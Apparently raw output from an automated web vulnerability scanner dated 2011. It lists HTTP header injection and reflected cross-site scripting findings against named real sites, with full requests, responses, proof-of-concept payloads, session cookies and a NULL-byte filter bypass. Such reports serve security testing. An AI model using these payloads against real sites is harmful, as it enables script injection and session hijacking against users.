GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=2e03b%0d%0ad348ca74978&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the page request parameter is copied into the Location response header. The payload d57be%0d%0aa073224f42f was submitted in the page parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=ngh&site=PU.NGH.US&origin.page=Hosting&page=d57be%0d%0aa073224f42f&linkOrigin=Hosting&linkId=ngh HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the site request parameter is copied into the Location response header. The payload 6bf4e%0d%0a357848c4060 was submitted in the site parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=6bf4e%0d%0a357848c4060&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the sourcearea request parameter is copied into the Location response header. The payload 29bf0%0d%0ad43926d593f was submitted in the sourcearea parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&origin.page=Hosting&linkId=weiter&site=PU.NGH.US&page=switch&sourcearea=29bf0%0d%0ad43926d593f HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the __lf request parameter is copied into the Location response header. The payload ab024%0d%0acfe55b3b16 was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload e4fdd%0d%0a682e1dc8167 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
The value of the __lf request parameter is copied into the Location response header. The payload 70f82%0d%0ae7e5d5b7eec was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload 1fd04%0d%0a0cd46c6d446 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top1fd04%0d%0a0cd46c6d446&__sendingdata=1&packageselection=Hosting&cart.action=add-bundle&cart.bundle=tariff-home-package-bundle HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 is copied into the Location response header. The payload 41e09%0d%0af4b2c7153f2 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Request
GET /webde/webde-s/41e09%0d%0af4b2c7153f2?homepage.startseite.pi.home&ns__t=1300646035235&hp_size=1024&hp_country=de&hp_lang=de&hp_portal=webde&hp_userlevel=none&ns_type=view&hp_s_res=1920x1200&hp_s_view=1096x916&ns_c=utf-8&hp_tp=2284&hp_ab=0&ns_jspageurl=http%3a//www.web.de/&ns_ti=web.de+-+e-mail+-+suche+-+dsl+-+de-mail+-+shopping+-+entertainment&ns_referrer=http%3a//www.united-internet.de/deref%3flink%3dhttp%253a%252f%252fwww.web.de%26__sign%3da07b9045963854a3552981589724d9be%26__ts%3d1300644360211 HTTP/1.1 Host: wa.ui-portal.de Proxy-Connection: keep-alive Referer: http://www.web.de/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 302 Found Date: Sun, 20 Mar 2011 18:55:11 GMT Server: Apache Expires: Sat, 01 Jan 2000 00:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="http://www.nedstat.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND NAV COM" Set-Cookie: s1=4D864D8F636D0144; expires=Fri, 18-Mar-2016 18:55:11 GMT; path=/webde/webde-s/ Location: http://wa.ui-portal.de/webde/webde-s/41e09 f4b2c7153f2?homepage.startseite.pi.home&ns_m2=yes&ns_setsiteck=4D864D8F636D0144&ns__t=1300646035235&hp_size=1024&hp_country=de&hp_lang=de&hp_portal=webde&hp_userlevel=none&ns_type=view&hp_s_res=1920x1200&hp_s_view=1096x916&ns_c=utf-8&hp_tp=2284&hp_ab=0&ns_jspageurl=http%3a//www.web.de/&ns_ti=web.de+-+e-mail+-+suche+-+dsl+-+de-mail+-+shopping+-+entertainment&ns_referrer=http%3a//www.united-internet.de/deref%3flink%3dhttp%253a%252f%252fwww.web.de%26__sign%3da07b9045963854a3552981589724d9be%26__ts%3d1300644360211 Content-Length: 811 Connection: close Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://wa.ui-portal.de/webde/webde-s/41e09 f4b ...[SNIP]...
4. Cross-site scripting (reflected)previousnext There are 227 instances of this issue:
4.1. http://ad.adtegrity.net/st [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.adtegrity.net
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 27220"-alert(1)-"e1de420c95d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=300x250§ion=803366&27220"-alert(1)-"e1de420c95d=1 HTTP/1.1 Host: ad.adtegrity.net Proxy-Connection: keep-alive Referer: http://cache.techie-buzz.com/ads/300_1_filler.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Sun, 20 Mar 2011 17:29:28 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Sun, 20 Mar 2011 17:29:28 GMT Pragma: no-cache Content-Length: 4636 Age: 0 Proxy-Connection: close
<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag_type = "iframe"; rm_url = "http://ad.adtegrity.net/imp?27220"-alert(1)-"e1de420c95d=1&Z=300x250&s=803366&_salt=1378450436";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Ar ...[SNIP]...
The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76d73"-alert(1)-"e256c65c434 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=76d73"-alert(1)-"e256c65c434 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7321 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 14:48:16 GMT Expires: Sun, 20 Mar 2011 14:48:16 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... mh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=76d73"-alert(1)-"e256c65c434http://ads.networksolutions.com/landing?code=P13C519S512N0B2A1D686E0000V100&promo=699DOMAINS"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscr ...[SNIP]...
The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a967c"-alert(1)-"3450cf13752 was submitted in the ai parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAEa967c"-alert(1)-"3450cf13752&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 14:47:44 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 14:47:44 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7363
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 26AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAEa967c"-alert(1)-"3450cf13752&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP13C519S512N0B2A1D686E0000V100%26promo%3D699DOMAINS"); var fsc ...[SNIP]...
The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9773"-alert(1)-"7d6db04947d was submitted in the client parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065e9773"-alert(1)-"7d6db04947d&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 14:48:14 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 14:48:14 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7322
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... EtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065e9773"-alert(1)-"7d6db04947d&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP13C519S512N0B2A1D686E0000V100%26promo%3D699DOMAINS"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg ...[SNIP]...
The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae102"-alert(1)-"e83e49284e8 was submitted in the num parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1ae102"-alert(1)-"e83e49284e8&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 20 Mar 2011 14:47:54 GMT Vary: Accept-Encoding Expires: Sun, 20 Mar 2011 14:47:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7322
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... NjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1ae102"-alert(1)-"e83e49284e8&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ&client=ca-pub-6213915329796065&adurl=http%3a%2f%2fads.networksolutions.com/landing%3Fcode%3DP13C519S512N0B2A1D686E0000V100%26promo%3D699DOMAINS"); var fscUrl = ...[SNIP]...
The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %009d689"-alert(1)-"d3bf0e85614 was submitted in the sig parameter. This input was echoed as 9d689"-alert(1)-"d3bf0e85614 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Request
GET /adi/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B13lZZxOGTYLdDaPqlQfouIi3DpWpie8B3YCL8hLjqLazM4C6twMQARgBII2NhQI4AGDJBqABo67u9gOyARJzZXJ2ZXJpbnNpZGVycy5jb226AQoxNjB4NjAwX2FzyAEJ2gEvaHR0cDovL3NlcnZlcmluc2lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ%009d689"-alert(1)-"d3bf0e85614&client=ca-pub-6213915329796065&adurl=;ord=204549332? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7292 Cache-Control: no-cache Pragma: no-cache Date: Sun, 20 Mar 2011 14:48:06 GMT Expires: Sun, 20 Mar 2011 14:48:06 GMT
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... lkZXJzLmNvbS9pc3Avc29waGlkZWEtaW5jLmh0bWzgAQW4AhjAAgXIAuXvxRjgAgDqAh1TZXJ2ZXJJbnNpZGVycy1MZWZ0QmFubmVyVW5pdJADpAOYA5oIqAMB0QNftM276KVd5OgDsAL1AwAAAMTgBAE&num=1&sig=AGiWqtzmgH8IwNBGwqgifvYsJ1J7M9wPmQ%009d689"-alert(1)-"d3bf0e85614&client=ca-pub-6213915329796065&adurl=http://ads.networksolutions.com/landing?code=P61C151S512N0B2A1D687E0000V100&promo=BCXXX03936"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = " ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a12e2"-alert(1)-"d2dd61e57b5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
